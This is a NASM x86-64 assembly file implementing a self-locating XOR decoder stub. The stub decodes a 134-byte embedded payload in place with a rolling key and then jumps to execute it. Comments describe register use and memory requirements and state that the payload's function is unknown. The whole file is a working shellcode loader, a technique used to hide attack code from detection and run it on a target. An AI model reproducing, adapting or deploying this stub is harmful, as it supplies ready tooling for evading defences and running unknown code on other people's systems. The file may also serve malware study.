XorShellcodeDecode.asm
;-----------------------------------------------------------------------
; XOR decoder stub (NASM syntax, x86-64, no absolute addresses).
;
; Locates encoded_buffer with a jmp/call/pop sequence, XORs each of its
; BUFFER_SIZE bytes in place with a rolling one-byte key, then jumps to
; the start of the buffer.
;
; Key for byte i (0-based) = (XOR_KEY + i) & 0xFF.
;
; Registers: rsi    = cursor into encoded_buffer
;            cl/rcx = bytes remaining
;            al     = key byte for the current position
; Stack:     one 8-byte slot holds the buffer address during the loop.
;
; Observations for analysis:
;   - The buffer sits in the same section as the code and is rewritten
;     in place, so the stub needs that memory to be both writable and
;     executable; where the page is not writable the first xor store
;     faults.
;   - Only CL is loaded before `loop`, which counts in the full RCX in
;     64-bit mode, so the stub assumes the upper bits of RCX are zero
;     on entry.
;   - Because only CL carries the count, the buffer is limited to 255
;     bytes.
;   - What the decoded bytes do is not established by this file.
;-----------------------------------------------------------------------
BITS 64
section .text
global _start
_start:
jmp short _get_addr ; jump forward to the call placed directly before the data
_decoder:
pop rsi ; rsi = return address pushed by the call = address of encoded_buffer
push rsi ; keep a copy on the stack for the final jump
mov cl, BUFFER_SIZE ; cl = bytes to decode; the rest of rcx is left untouched
_loop:
mov al, cl ; al = bytes remaining
neg al ; al = -remaining (mod 256)
add al, XOR_KEY
add al, BUFFER_SIZE & 0xFF ; al = (XOR_KEY + BUFFER_SIZE - remaining) & 0xFF, i.e. XOR_KEY + index
xor byte [rsi], al ; decode the current byte in place
inc rsi ; advance to the next encoded byte
loop _loop ; decrement rcx and repeat while it is non-zero
pop rsi ; rsi = start of the buffer, now decoded
jmp rsi ; transfer control to the decoded bytes
_get_addr:
call _decoder ; pushes the address of the next byte (encoded_buffer) and enters the decoder
; Encoded payload: 8 rows of 16 bytes plus 6 bytes = 134 = BUFFER_SIZE.
encoded_buffer:
db 0x66, 0x60, 0x60, 0x6D, 0x71, 0xB3, 0xDE, 0xD4, 0x3D, 0x3E, 0x3F, 0x40, 0x1F, 0x0A, 0xC0, 0x82
db 0x3F, 0xFD, 0x6F, 0x4A, 0x49, 0x4A, 0xC2, 0x93, 0x9C, 0xA1, 0x7E, 0x99, 0x68, 0xAB, 0x20, 0x74
db 0x5A, 0xE1, 0x53, 0x16, 0x18, 0xD2, 0x9B, 0x9D, 0xB5, 0x56, 0x1E, 0xE8, 0xA0, 0x23, 0xE3, 0x94
db 0xCE, 0x27, 0xA7, 0xA0, 0x6D, 0x2F, 0x43, 0xA4, 0x29, 0xE6, 0x6B, 0x7E, 0x8E, 0xB3, 0x98, 0xA8
db 0xFC, 0x8E, 0xF4, 0x98, 0x85, 0xBB, 0x93, 0x7E, 0x4C, 0xB7, 0x46, 0x41, 0xF2, 0x8F, 0x08, 0x90
db 0x0B, 0x47, 0x45, 0x98, 0x00, 0x9E, 0x05, 0x73, 0x4C, 0x65, 0x60, 0xC7, 0xC7, 0xDA, 0x1A, 0x64
db 0xDD, 0x97, 0x6F, 0xD0, 0x10, 0x63, 0xD3, 0xAD, 0x4F, 0xD6, 0x1A, 0x69, 0xD5, 0xA8, 0x2B, 0xB4
db 0xED, 0x59, 0x67, 0xE0, 0x56, 0x63, 0x40, 0x5D, 0xF3, 0xF1, 0xE7, 0x39, 0x5D, 0xEF, 0xEC, 0xFC
db 0x3C, 0x46, 0xE9, 0xE3, 0x46, 0x5A
BUFFER_SIZE equ 0x86 ; FIXED (author's tag): byte length of encoded_buffer, 0x86 = 134
XOR_KEY equ 0x35 ; CHANGES (author's tag): starting key byte; presumably regenerated along with the encoded bytes - confirm against the encoder